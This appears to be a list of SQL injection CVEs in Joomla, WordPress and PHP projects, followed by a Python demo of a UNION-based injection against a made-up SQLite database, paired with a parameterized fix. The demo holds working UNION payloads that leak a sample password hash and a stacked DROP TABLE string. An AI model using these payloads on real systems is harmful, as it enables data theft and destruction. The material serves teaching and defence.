| CVE | Vendors | Products | Updated | CVSS v3.1 |
| Joomla! Component vAccount 2.0.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the vid parameter. Attackers can send GET requests to the vaccount-dashboard/expense endpoint with crafted SQL payloads in the vid parameter to extract sensitive database information including version and database names. |
| Joomla Component J-MultipleHotelReservation 6.0.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hotel_id parameter. Attackers can send POST requests to the search-hotels endpoint with crafted SQL UNION SELECT statements to extract sensitive database information including table names and column data. |
| A vulnerability was identified in ILIAS Learning Management System 11.0. It affects the function ilTrQuery::executeQueries in the file components/ILIAS/Tracking/classes/class.ilTrQuery.php of the Learning Progress Tracking component. Manipulation of the argument troup_table_nav leads to SQL injection. The attack can be launched remotely. A public exploit exists and may be used. The vendor was contacted early about this disclosure but did not respond. |
| Unauthenticated SQL Injection in ListingPro <= 2.9.10 versions. |
| Unauthenticated SQL Injection in wpDataTables <= 7.3.6 versions. |
| Subscriber SQL Injection in Events Schedule - WordPress Events Calendar Plugin <= 2.7.2 versions. |
| Subscriber SQL Injection in WooCommerce Frontend Manager – Ultimate < 6.7.7 versions. |
| Unauthenticated SQL Injection in WPJobster <= 6.3.5 versions. |
| Unauthenticated SQL Injection in JetSmartFilters <= 3.8.1 versions. |
| Unauthenticated SQL Injection in JetEngine <= 3.8.9.1 versions. |
| Unauthenticated SQL Injection in JetSearch <= 3.5.17 versions. |
| Unauthenticated SQL Injection in JetEngine < 3.8.9.1 versions. |
| Subscriber SQL Injection in Cornerstone < 7.8.8 versions. |
| Unauthenticated SQL Injection in JetEngine <= 3.8.10.1 versions. |
| Unauthenticated SQL Injection in Advanced Ads – Tracking < 3.0.7 versions. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webilia Inc. Listdom allows Blind SQL Injection. This issue affects Listdom: from n/a through 5.4.0. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cargo RD Cargo Shipping Location for WooCommerce allows Blind SQL Injection. This issue affects Cargo Shipping Location for WooCommerce: from n/a through 5.6. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Travel WP Travel Gutenberg Blocks allows Blind SQL Injection. This issue affects WP Travel Gutenberg Blocks: from n/a through 3.9.4. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VillaTheme GIFT4U allows Blind SQL Injection. This issue affects GIFT4U: from n/a through 1.0.10. |
| Nur-Alam39 bus-ticket (no released versions; latest commit 459cabdbeb99c00225b26e46e3c2c30ae1de7bad) contains an unauthenticated SQL injection vulnerability in bus_info.php. The busid parameter received via HTTP POST is concatenated directly into a MySQL query (select * from bus_info where id=$busid) without sanitization, escaping, or parameterization, and in a numeric (unquoted) context. A remote, unauthenticated attacker can inject arbitrary SQL — for example a UNION-based payload such as busid=-1 UNION SELECT 1,2,3,4,5,6 — to read arbitrary data from the bus_service database. The application connects to the database as the MySQL root account with an empty password, increasing the potential impact. The query is executed via mysqli_query(), which does not permit stacked (semicolon-separated) statements. |
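The bus-ticket entry above, and the two Joomla entries at the top of the list (vid on vaccount-dashboard/expense, hotel_id on search-hotels), all describe the same bug class: an unvalidated request parameter concatenated into a query in a numeric, unquoted context, exploited with a UNION SELECT whose column count matches the original query. The following is an added example, not code from any of the listed projects, that reproduces that pattern against a constructed SQLite schema (six columns, so the page's `-1 UNION SELECT 1,2,3,4,5,6` shape lines up), shows what the UNION payload leaks, shows the hardened form with integer validation plus a bound parameter, and shows that a single-statement execute call rejects a stacked `; DROP` payload, which is the same property the page attributes to mysqli_query(). Table and column names, sample rows and the `admin_users` table are assumptions for illustration; `sqlite_version()` stands in for the MySQL `version()`/`database()` calls the Joomla entries mention.

```python
import sqlite3

# Constructed sample schema (not the real bus_service database).
# bus_info has six columns so the UNION payload must supply six values.
SCHEMA = """
CREATE TABLE bus_info (
    id INTEGER PRIMARY KEY, bus_name TEXT, route TEXT,
    seats INTEGER, fare INTEGER, departs TEXT
);
INSERT INTO bus_info VALUES (1, 'Green Line', 'Dhaka-Sylhet', 40, 900, '08:00');
INSERT INTO bus_info VALUES (2, 'Ena', 'Dhaka-Chittagong', 36, 1100, '21:30');
CREATE TABLE admin_users (id INTEGER, username TEXT, password_hash TEXT);
INSERT INTO admin_users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_bus_vulnerable(conn, busid):
    """Mirrors the bus_info.php pattern: the request value is concatenated
    into the query in an unquoted numeric context, so the attacker needs
    no quote character to break out of it."""
    sql = f"select * from bus_info where id={busid}"
    return conn.execute(sql).fetchall()


def lookup_bus_fixed(conn, busid):
    """Hardened form: reject anything that is not an integer, then bind it
    as a parameter so the driver never treats the value as SQL."""
    try:
        busid = int(busid)
    except (TypeError, ValueError):
        return []
    return conn.execute("select * from bus_info where id=?", (busid,)).fetchall()


# UNION payload in the shape the page describes: a negative id so the left
# side matches nothing, then attacker-chosen columns from another table.
UNION_PAYLOAD = "-1 UNION SELECT id, username, password_hash, 4, 5, 6 FROM admin_users"

# Fingerprinting payload; MySQL targets would use version() and database().
VERSION_PAYLOAD = "-1 UNION SELECT 1, sqlite_version(), 3, 4, 5, 6"

# Stacked-statement attempt; a single-statement execute API refuses it.
STACKED_PAYLOAD = "1; DROP TABLE admin_users"


def stacked_statement_outcome(conn):
    """Returns 'rejected' if the driver refuses a second statement (the
    behaviour the page attributes to mysqli_query), else 'executed'."""
    try:
        lookup_bus_vulnerable(conn, STACKED_PAYLOAD)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # sqlite3 raises "You can only execute one statement at a time."
        return "rejected"
    return "executed"


def demo():
    conn = connect()
    leaked = lookup_bus_vulnerable(conn, UNION_PAYLOAD)   # admin row leaks
    version = lookup_bus_vulnerable(conn, VERSION_PAYLOAD)[0][1]
    blocked = lookup_bus_fixed(conn, UNION_PAYLOAD)       # [] after int() fails
    stacked = stacked_statement_outcome(conn)
    return leaked, version, blocked, stacked


if __name__ == "__main__":
    leaked, version, blocked, stacked = demo()
    print("vulnerable query leaked:", leaked)
    print("engine version via UNION:", version)
    print("hardened query returned:", blocked)
    print("stacked statement was:", stacked)
```

The point of the `stacked_statement_outcome` check is the caveat in the entry: a driver that executes one statement per call limits the attacker to in-band techniques (UNION, error-based, blind), not to nothing. The UNION result shows why that is still full read access to whatever the database account can see, which matters all the more when, as the entry states, that account is MySQL root with an empty password.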